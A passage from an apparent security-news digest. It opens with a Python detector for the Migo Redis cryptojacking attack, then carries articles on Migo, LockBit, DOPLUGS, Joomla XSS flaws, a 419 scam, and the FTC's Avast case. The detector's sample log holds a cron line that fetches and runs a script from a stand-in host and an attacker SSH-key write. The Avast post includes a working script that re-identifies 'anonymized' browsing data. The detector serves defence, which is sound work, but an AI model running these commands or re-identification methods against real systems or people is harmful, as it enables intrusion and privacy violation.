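# Options the attack disabled before writing keys to disk.
WEAKENING_OPTIONS = {
    "protected-mode",
    "replica-read-only",
    "aof-rewrite-incremental-fsync",
    "rdb-save-incremental-fsync",
}

LINE_RE = re.compile(
    r'^(?P<ts>\d+\.\d+) \[(?P<db>\d+) (?P<client>[^\]]+)\] (?P<rest>.+)$'
)
SSH_KEY_RE = re.compile(
    r'\b(?:ssh-(?:rsa|ed25519|dss)|ecdsa-sha2-nistp\d+) [A-Za-z0-9+/=]+'
)
# Five crontab schedule fields (digits, *, /, comma, dash) at a line start.
CRON_RE = re.compile(r'^\s*(?:[\d*/,\-]+\s+){5}\S', re.MULTILINE)


def parse_monitor_line(line):
    """Split one MONITOR line into {ts, client, cmd, args}; None if malformed."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    try:
        args = shlex.split(m.group("rest"))  # MONITOR double-quotes each arg
    except ValueError:
        return None
    if not args:
        return None
    client = m.group("client").rsplit(":", 1)[0]  # drop the ephemeral port
    return {"ts": float(m.group("ts")), "client": client,
            "cmd": args[0].upper(), "args": args[1:]}


def classify(event):
    """Return a label for a suspicious command, or None for benign traffic."""
    cmd, args = event["cmd"], event["args"]
    if cmd == "CONFIG" and len(args) >= 3 and args[0].upper() == "SET":
        option, value = args[1].lower(), args[2].lower()
        if option in WEAKENING_OPTIONS and value == "no":
            return "config-weakening:" + option
    if cmd == "SET" and len(args) >= 2:
        # MONITOR escapes newlines as the two characters '\' 'n'; restore
        # them so multi-line payloads are inspected line by line.
        value = args[1].replace("\\n", "\n")
        if SSH_KEY_RE.search(value):
            return "ssh-key-write"
        if CRON_RE.search(value):
            return "cron-write"
    return None


def scan_monitor(lines):
    """Return {client_ip: [labels in order seen]} for every suspicious command."""
    findings = defaultdict(list)
    for line in lines:
        event = parse_monitor_line(line)
        if event is None:
            continue
        label = classify(event)
        if label:
            findings[event["client"]].append(label)
    return dict(findings)


def is_migo_like(labels):
    """True when one client both weakened the config and planted a key or cron job."""
    weakened = any(l.startswith("config-weakening:") for l in labels)
    planted = any(l in ("ssh-key-write", "cron-write") for l in labels)
    return weakened and planted


# Constructed MONITOR excerpt: one hostile client (203.0.113.5) and one
# legitimate application client (198.51.100.7); the key material is fake.
SAMPLE_MONITOR = [
    '1708419000.102345 [0 203.0.113.5:41234] "CONFIG" "SET" "protected-mode" "no"',
    '1708419000.203456 [0 203.0.113.5:41234] "CONFIG" "SET" "replica-read-only" "no"',
    '1708419000.304567 [0 203.0.113.5:41234] "CONFIG" "SET" "aof-rewrite-incremental-fsync" "no"',
    '1708419000.405678 [0 203.0.113.5:41234] "CONFIG" "SET" "rdb-save-incremental-fsync" "no"',
    '1708419000.506789 [0 203.0.113.5:41234] "SET" "backup1" '
    '"\\n\\nssh-rsa AAAAB3NzaC1yc2EFAKEKEYFORTHEEXAMPLE attacker@example.invalid\\n"',
    '1708419000.607890 [0 203.0.113.5:41234] "SET" "backup2" '
    '"\\n*/2 * * * * root curl -fsSL http://payload.example.invalid/x.sh | sh\\n"',
    '1708419001.000000 [0 198.51.100.7:50000] "SET" "session:42" "user=alice"',
    '1708419002.000000 [0 198.51.100.7:50000] "GET" "session:42"',
]

if __name__ == "__main__":
    for client, labels in scan_monitor(SAMPLE_MONITOR).items():
        verdict = "MIGO-LIKE" if is_migo_like(labels) else "suspicious"
        print(f"{client}: {verdict} -> {', '.join(labels)}")
```

In production the same functions can be fed from `redis-cli MONITOR` piped to a log collector; MONITOR itself costs throughput, so an alternative is to alert on the same CONFIG SET options in the Redis server log or to reject CONFIG via rename-command.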

The main Migo payload (/tmp/.migo) is distributed as an ELF file packed with UPX, statically linked and stripped. This ELF file can target x86_64 architecture. The sample employs standard UPX packing, preserving the UPX header, and can be easily unpacked using the command upx -d.

Upon execution, the Migo binary checks for the presence of a file at /tmp/.migo_running. If this file doesn’t exist, the malicious code creates it, determines its own process ID and writes it to the file. The file serves as an infection marker for the attacker.

Then the binary downloads an XMRig installer hosted on GitHub, terminates competing miners and establishes persistence, then it launches the miner.

In summary, the binary performs the following actions:

  • Make the copied version of the binary executable, to be executed via a persistence mechanism
  • Disable SELinux and search for uninstallation scripts for monitoring agents bundled in compute instances from cloud providers such as Qcloud and Alibaba Cloud
  • Execute the miner and pass the dropped configuration into it
  • Configure iptables to drop outbound traffic to specific IPs
  • Kill competing miners and payloads from similar campaigns
  • Register persistence via the systemd timer system-kernel.timer

Migo demonstrates the interest of threat actors in targeting cloud infrastructure for mining purposes. The attackers continue to improve their capability to exploit web-facing services.

Researchers believe that the Migo developers possess knowledge of the malware analysis process, implementing extra measures to obscure symbols and strings within the pclntab structure, thereby complicating reverse engineering.


Pierluigi Paganini

(SecurityAffairs – ransomware, miner) 

US Gov offers a reward of up to $15M for info on LockBit gang members and affiliates

21 February 2024 at 21:17

U.S. government offers rewards of up to $15 million for information that could lead to the identification or location of LockBit ransomware gang members and affiliates.

The U.S. Department of State is offering a reward of up to $15 million for information leading to the identification or location of members of the Lockbit ransomware gang and their affiliates. 

“The Department of State is announcing reward offers totaling up to $15 million for information leading to the arrest and/or conviction of any individual participating in a LockBit ransomware variant attack and for information leading to the identification and/or location of any key leaders of the LockBit ransomware group.” reads the press release published by the U.S. Department of State.

According to the press release published by the Department of State, the LockBit ransomware operators have carried out over 2,000 attacks against victims worldwide since January 2020. LockBit ransomware attacks have resulted in more than $144 million in ransom payments for recovery.

The rewards are provided under the Transnational Organized Crime Rewards Program (TOCRP) which already targeted other ransomware operations.

The Department of State has set up a Tor website that can be used to anonymously provide information on LockBit’s operation.

Yesterday, a joint law enforcement action, code-named Operation Cronos, conducted by law enforcement agencies from 11 countries disrupted the LockBit ransomware operation.

Operation Cronos is still ongoing, and the NCA announced that more information has yet to be shared.

The operation led to the arrest of two members of the ransomware gang in Poland and Ukraine and the seizure of hundreds of crypto wallets used by the group.

The British NCA took control of LockBit’s central administration environment used by the RaaS affiliates to carry out the cyberattacks. The authorities also seized the dark web Tor leak site used by the group.

The Tor leak site was seized by the NCA and is now used to publish updates on the law enforcement operation and provide support to the victims of the gang.


The NCA also obtained the source code of the LockBit platform and a huge trove of information on the group’s operation, including information on affiliates and supporters.

Law enforcement also had access to data stolen from the victims of the ransomware operation, a circumstance that highlights the fact that even when a ransom is paid, the ransomware gang often fails to delete the stolen information.

“LockBit had a bespoke data exfiltration tool, known as Stealbit, which was used by affiliates to steal victim data. Over the last 12 hours this infrastructure, based in three countries, has been seized by members of the Op Cronos taskforce, and 28 servers belonging to LockBit affiliates have also been taken down.” reads the NCA’s announcement. “The technical infiltration and disruption is only the beginning of a series of actions against LockBit and their affiliates. In wider action coordinated by Europol, two LockBit actors have been arrested this morning in Poland and Ukraine, over 200 cryptocurrency accounts linked to the group have been frozen.”

The US Department of Justice has charged two individuals with orchestrating ransomware attacks using the LockBit ransomware; they are currently in custody and will stand trial in the US.

“The Justice Department also unsealed an indictment obtained in the District of New Jersey charging Russian nationals Artur Sungatov and Ivan Kondratyev, also known as Bassterlord, with deploying LockBit against numerous victims throughout the United States, including businesses nationwide in the manufacturing and other industries, as well as victims around the world in the semiconductor and other industries. Today, additional criminal charges against Kondratyev were unsealed in the Northern District of California related to his deployment in 2020 of ransomware against a victim located in California.” reads the press release published by DoJ. 

“Finally, the Department also unsealed two search warrants issued in the District of New Jersey that authorized the FBI to disrupt multiple U.S.-based servers used by LockBit members in connection with the LockBit disruption.”

Additionally, the US authorities have unveiled indictments against two Russian nationals, accusing them of conspiring to carry out LockBit attacks.

The NCA and its global partners have secured over 1,000 decryption keys that will allow victims of the gang to recover their files for free. The NCA will reach out to victims based in the UK in the coming days and weeks, providing support to help them recover encrypted data.

The free decryptor for the Lockbit ransomware can be downloaded from the website of the ‘No More Ransom’ initiative. It’s unclear which version of the ransomware is targeted by the decryptor.

LockBit is a prominent ransomware operation that first emerged in September 2019. In 2022, LockBit was one of the most active ransomware groups, and its prevalence continued into 2023. Since January 2020, affiliates utilizing LockBit have targeted organizations of diverse sizes spanning critical infrastructure sectors such as financial services, food and agriculture, education, energy, government and emergency services, healthcare, manufacturing, and transportation. The LockBit ransomware operation operated under a Ransomware-as-a-Service (RaaS) model, recruiting affiliates to carry out ransomware attacks through the utilization of LockBit ransomware tools and infrastructure.


Pierluigi Paganini

(SecurityAffairs – hacking, ransomware)

New Mustang Panda campaign targets Asia with a backdoor dubbed DOPLUGS

22 February 2024 at 07:06

China-linked APT group Mustang Panda targeted various Asian countries with a variant of the PlugX (aka Korplug) backdoor dubbed DOPLUGS.

Trend Micro researchers uncovered a cyberespionage campaign, carried out by China-linked APT group Mustang Panda, targeting Asian countries, including Taiwan, Vietnam, and Malaysia.

Mustang Panda has been active since at least 2012, it targeted American and European entities such as government organizations, think tanks, NGOs, and even Catholic organizations at the Vatican. Past campaigns were focused on Asian countries, including Taiwan, Hong Kong, Mongolia, Tibet, and Myanmar. In the 2022 campaigns, threat actors used European Union reports on the conflict in Ukraine and Ukrainian government reports as lures. Upon opening the reports, the infection process starts leading to the deployment of malware on the victim’s system.

In the recent campaign, threat actors used a customized PlugX malware that includes a completed backdoor command module; the researchers named it DOPLUGS.

“This kind of customized PlugX malware has been active since 2022, with related research being published by Secureworks, Recorded Future, Check Point, and Lab52. During analysis, we observed that the piece of customized PlugX malware is dissimilar to the general type of the PlugX malware that contains a completed backdoor command module, and that the former is only used for downloading the latter.” reads the report published by Trend Micro. “Due to its different functionality, we decided to give this piece of customized PlugX malware a new name: DOPLUGS.”

The malware analysis revealed the use of the KillSomeOne module that supports USB worm capability. KillSomeOne was first disclosed by a Sophos report in November 2020.

Threat actors conducted spear-phishing attacks, using files related to current events as bait, such as the Taiwanese presidential election that took place in January 2024.

The spear-phishing emails sent by the threat actors include a Google Drive link that hosts a password-protected archive file, which will download DOPLUGS malware.


DOPLUGS acts as a downloader and supports four backdoor commands. One of the commands allows the malware to download a generic version of the PlugX malware.


The DOPLUGS samples included the KillSomeOne module and used a launcher component that executes the legitimate executable to perform DLL-sideloading. The launcher also downloads the next-stage malware from a remote server.

“Earth Preta has primarily focused on targeting government entities worldwide, particularly within the Asia-Pacific region and Europe.” concludes the report. “Based on our observations, we believe Earth Preta tends to use spear-phishing emails and Google Drive links in its attacks.”


Pierluigi Paganini

(SecurityAffairs – hacking, Earth Preta)

Multiple XSS flaws in Joomla can lead to remote code execution

22 February 2024 at 15:14

Joomla maintainers have addressed multiple vulnerabilities in the popular content management system (CMS) that can lead to arbitrary code execution.

The maintainers of the Joomla! Project released Joomla 5.0.3 and 4.4.3 versions that addressed the following vulnerabilities in the popular content management system (CMS):

  • [20240201] – CVE-2024-21722 Core – Insufficient session expiration in MFA management views: The MFA management features did not properly terminate existing user sessions when a user’s MFA methods were modified.
  • [20240202] – CVE-2024-21723 Core – Open redirect in installation application: Inadequate parsing of URLs could result in an open redirect.
  • [20240203] – CVE-2024-21724 Core – XSS in media selection fields: Inadequate input validation for media selection fields leads to XSS vulnerabilities in various extensions.
  • [20240204] – CVE-2024-21725 Core – XSS in mail address outputs: Inadequate escaping of mail addresses leads to XSS vulnerabilities in various components.
  • [20240205] – CVE-2024-21726 Core – Inadequate content filtering within the filter code: Inadequate content filtering leads to XSS vulnerabilities in various components.

The impact of these flaws can be widespread because roughly 2% of all websites, millions of sites worldwide, use Joomla.

“The widespread usage of Joomla and the fact that most deployments are publicly accessible makes it a valuable target for threat actors. Just recently, Joomla was targeted in an attack against different organizations via an improper access control vulnerability (CVE-2023-23752).” reported cybersecurity firm Sonarsource which discovered an issue that led to the XSS vulnerabilities in the popular Content Management System.

The researchers pointed out that an attacker can exploit these issues to gain remote code execution by tricking an administrator into clicking on a malicious link.

“While we won’t be disclosing technical details at this time, we want to emphasize the importance of prompt action to mitigate this risk. We strongly advise all Joomla users to update to the latest version. The first release known to address the vulnerability is Joomla version 5.0.3/4.4.3.” states Sonarsource which did not disclose technical details about the issues to avoid massive exploitation in the wild.


Pierluigi Paganini

(SecurityAffairs – hacking, Joomla)

“Beyond the border scam”, pay attention to the instance of the new Nigerian fraud

22 February 2024 at 19:25

Security researcher Salvatore Lombardo shared details about a new instance of Nigerian fraud that he called ‘Beyond the border scam.’

The 419 scam is a form of scam that requires the recipient to pay an upfront sum to receive a much larger reward later. The name derives from article 419 of the Nigerian penal code, which punishes this type of fraud, and it is therefore also known as Nigerian fraud. The 419 scam is based on deception and psychological manipulation, exploiting the greed, pity, or curiosity of victims. Here is an example of the new Nigerian scam, to which I have given the name “Beyond the border scam”, which is carried out entirely online and via email. In the following description, I have omitted the names mentioned, so as not to potentially involve real names that have nothing to do with the ongoing scam.

The desperate cry for help

It all begins with a desperate, very direct request for help via email from an alleged Ukrainian widow residing in a refugee camp, who wants to receive a large sum of money bequeathed by her husband, who died in the war during the Russian invasion of Ukraine that began in 2022.

Following up on the electronic letter, the alleged widow begins a copious correspondence in which she says she was left completely alone after the death of her husband and children, without a home or money, and hosted in a border refugee camp, where she barely feeds herself and cannot afford to leave the camp, nor to operate her own bank account, but only to survive miserably.

“I am writing to you from an old desktop computer in the tent of the chaplain who works on behalf of a refugee agency, because here there is no internet point or effective means of communication. […] I have here with me access to my late husband’s online bank account and a paper copy of his last foreign bank statement, but I can no longer access the bank account and cannot make withdrawals or transfers because the account is frozen.”

Lavish compensation and conditions

In this dramatic scenario, here is the real request: “The bank manager, due to my refugee status, advised me to find a partner or representative anywhere in the world who will take care of me and receive the money on my behalf […]”, obviously for a generous fee: “Please, I really need your kind-hearted help and I am willing to offer you a part of the money if you help me.” Under the following conditions: “Do you accept my proposal to offer a quarter of the money as compensation for your help? Will you make sure to help me out of my unfortunate situation, receive the money and send me some to purchase my travel documents and start a new life? Do you ensure that you do not run away with the money once it is received in your bank account?”

“For security reasons,” the email continues, “the bank manager advised me to always remind my representative to keep this transaction confidential until the money successfully arrives in your checking account, so as to avoid the unjustified interception of our communications with their bank by some hacker on the internet.”


Sample of the request for the mandate that the representative must sign and send to the bank for the transfer of the inheritance

Here’s the scam

But to do all this, the representative should take responsibility for sending a letter requesting the transfer of funds to the indicated bank manager, attaching a series of documents that only the lady possesses, and only in paper format. “I only have the paper copy of my late husband’s last bank statement with the death certificate and I should scan them, attach them and send them to you now because it is important that you have a copy of these documents because the bank may request them, but there is no document scanning machine in our refugee camp. In order to scan, attach and send the copies, I will have to go to a center very far from our camp.”

The response of the elusive bank intermediary.

And here is the request for money. To be able to afford the trip and pay for the document scanning service, the widow would need financial support from her representative, which could be paid into an account made available by an elusive official of the usual refugee agency in service at the same tent city, justifying it by saying that “[…] Refugees are not allowed to operate a bank account because we do not have legal immigration documents here.”

Pay attention to the typical pattern

Obviously the account does not belong to a refugee agency but to an impostor owner and any sending of money would only end up in the hands of the scammer who will ask for more money to be sent to also pay for the legal assistance necessary for issuing the authorization to the transfer of inheritance. Therefore pay attention to the typical scheme:

  • The scam begins with an email received from an alleged widow in difficulty asking for help in receiving the inheritance of her husband who died in the war, in exchange for a large fee;
  • once the victim responds, other emails will arrive, with further information and the intermediation of a bank official and a refugee official;
  • Finally, personal details and financial support will be requested as well as all instructions to prepare the necessary documentation for the transfer of the fund, to be paid to an account of a refugee agency.

The 419 scam is very widespread and dangerous, and can cause serious economic and psychological damage to victims. To protect yourself in these cases it is important to be cautious and skeptical when receiving requests for money from strangers, especially from foreign countries. Furthermore, it is best to never provide your personal or banking details and to always report scam attempts and cases to the competent authorities.

For the moment the fraudulent account (probably not the only one) into which all the proceeds flow has collected approximately €1,371.00.


About the author: Salvatore Lombardo (Twitter @Slvlombardo)

Electronics engineer and Clusit member, for some time now, espousing the principle of conscious education, he has been writing for several online magazines on information security. He is also the author of the book “La Gestione della Cyber Security nella Pubblica Amministrazione”. “Education improves awareness” is his slogan.


Pierluigi Paganini

(SecurityAffairs – hacking, Nigerian fraud)

FTC charged Avast with selling users’ browsing data to advertising companies

22 February 2024 at 22:44

The US FTC charged cyber security firm Avast with harvesting consumer web browsing data through its browser extension and antivirus software and selling it.

The US Federal Trade Commission (FTC) has filed charges against cybersecurity firm Avast, accusing it of collecting and selling consumer web browsing data gathered through its browser extension and antivirus services. The antivirus firm is accused of selling the data to advertising companies without user consent.

According to the complaint, the cybersecurity firm was advertising its products as privacy-friendly. The company claimed their software would “block[] annoying tracking cookies that collect data on your browsing activities” and “[p]rotect your privacy by preventing . . . web services from tracking your online activity.”

“Since at least 2014, Respondents have collected consumers’ browsing information through browser extensions and antivirus software installed on consumers’ computers and mobile devices.” reads the FTC’s complaint. “Respondents sold the browsing information that they purported to protect, in many instances without notice to users.”

Avast subsidiary Jumpshot sold the collected information to over 100 third parties between 2014 and 2020.

The FTC will also fine Avast $16.5 million and order it to stop selling or licensing any web browsing data for advertising purposes.

FTC says despite its promises to protect consumers from online tracking, Avast sold consumers' browsing data to third parties /2

— FTC (@FTC) February 22, 2024

The data collected by Avast could allow third parties to profile users and their habits. According to the FTC, the company could also have combined this browsing information with persistent identifiers that it created, which uniquely identified each consumer’s device.

Collected browsing information, including web searches and webpages visited, revealed consumers’ religious beliefs, health concerns, political leanings, location, financial status, visits to child-directed content, and interest in prurient content.

The Czech security company claimed to have anonymized the data before selling it to third parties, but the FTC contends that the process did not prevent users from being identified.

“Using a proprietary algorithm developed by Avast, Avast and Jumpshot purported to find and remove identifying information prior to each transfer of consumer browsing information to Jumpshot’s servers. But this process was not sufficient to anonymize consumers’ browsing information, which Jumpshot then sold, in non-aggregate form, through a variety of different products to third parties.” states the complaint.
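The complaint’s point, that per-record scrubbing is not anonymization when records are sold in non-aggregate form and keyed by a persistent device identifier, is easy to reproduce. The script below is an added illustration written for this article; it is not Avast’s or Jumpshot’s algorithm and does not use real data. The clickstream, the hostnames and the `scrub()` rules (drop e-mail-like and long numeric query values, mask long numeric path segments) are all constructed assumptions. Even after scrubbing, a profile URL whose path carries a user handle survives, and because every row from one device shares the same pseudonym, the sensitive visits from that device can be joined to the handle.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl, urlencode, urlunsplit

# Constructed sample clickstream (not real data): (device pseudonym, timestamp, url).
# The device pseudonym stands in for the persistent identifier the complaint describes.
RECORDS = [
    ("dev-7f3a", "2019-03-01T08:02:11", "https://social.example/in/jane-doe-19?trk=nav&email=jane.doe%40example.org"),
    ("dev-7f3a", "2019-03-01T08:15:40", "https://health.example/conditions/type-2-diabetes"),
    ("dev-7f3a", "2019-03-02T19:33:05", "https://shop.example/orders/104839201?ref=email"),
    ("dev-c21e", "2019-03-01T09:10:00", "https://news.example/politics/local-election"),
    ("dev-c21e", "2019-03-03T21:44:12", "https://social.example/in/sam-lee-7"),
    ("dev-c21e", "2019-03-03T21:50:30", "https://bank.example/loans/debt-consolidation?acct=55512345678"),
]

EMAIL_RE = re.compile(r"[^@\s]+@[^@\s]+")
LONG_DIGITS_RE = re.compile(r"\d{6,}")
# Hypothetical mapping from host to the sensitive category a visit reveals.
SENSITIVE_HOSTS = {"health.example": "health", "bank.example": "finance", "news.example": "politics"}
# Hypothetical profile-page path on the constructed social site; the handle is a quasi-identifier.
HANDLE_RE = re.compile(r"^/in/([a-z0-9-]+)$")


def scrub(url):
    """Hypothetical per-record 'anonymizer': drop query values that look like e-mail
    addresses or long numeric IDs and mask long numeric path segments. It never looks
    at the path's textual components, so a profile handle passes through untouched."""
    parts = urlsplit(url)
    kept = []
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        if EMAIL_RE.search(value) or LONG_DIGITS_RE.search(value):
            continue
        kept.append((key, value))
    path = LONG_DIGITS_RE.sub("<id>", parts.path)
    return urlunsplit((parts.scheme, parts.netloc, path, urlencode(kept), ""))


def reidentify(records):
    """Group scrubbed rows by the persistent device pseudonym, find a profile handle
    that survived scrubbing, and attach every sensitive visit from the same device
    to that handle. Returns {handle: sorted list of sensitive categories}."""
    by_device = defaultdict(list)
    for device, _ts, url in records:
        by_device[device].append(scrub(url))

    linked = {}
    for urls in by_device.values():
        handle = None
        sensitive = set()
        for url in urls:
            parts = urlsplit(url)
            match = HANDLE_RE.match(parts.path)
            if match and parts.netloc == "social.example":
                handle = match.group(1)
            if parts.netloc in SENSITIVE_HOSTS:
                sensitive.add(SENSITIVE_HOSTS[parts.netloc])
        if handle:
            linked[handle] = sorted(sensitive)
    return linked


if __name__ == "__main__":
    for device, _ts, url in RECORDS:
        print(device, scrub(url))
    print(reidentify(RECORDS))
```

The scrubber does remove the obvious tokens (the e-mail address and the account number never reach the output), which is why a vendor can claim the data is "anonymized". The failure is structural rather than a bug in the regexes: as long as each row keeps a stable device key and the rows are released individually, any single quasi-identifier anywhere in a device’s history re-links the whole history. Aggregation (releasing counts per domain, not per device) or dropping the persistent key is what actually breaks the join.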

Below is the statement shared by Avast in response to the FTC:

“Avast has reached a settlement with the FTC to resolve its investigation of Avast’s past provision of customer data to its Jumpshot subsidiary that Avast voluntarily closed in January of 2020. We are committed to our mission of protecting and empowering people’s digital lives. While we disagree with the FTC’s allegations and characterization of the facts, we are pleased to resolve this matter and look forward to continuing to serve our millions of customers around the world.”

Pierluigi Paganini

(SecurityAffairs – hacking, AVAST)
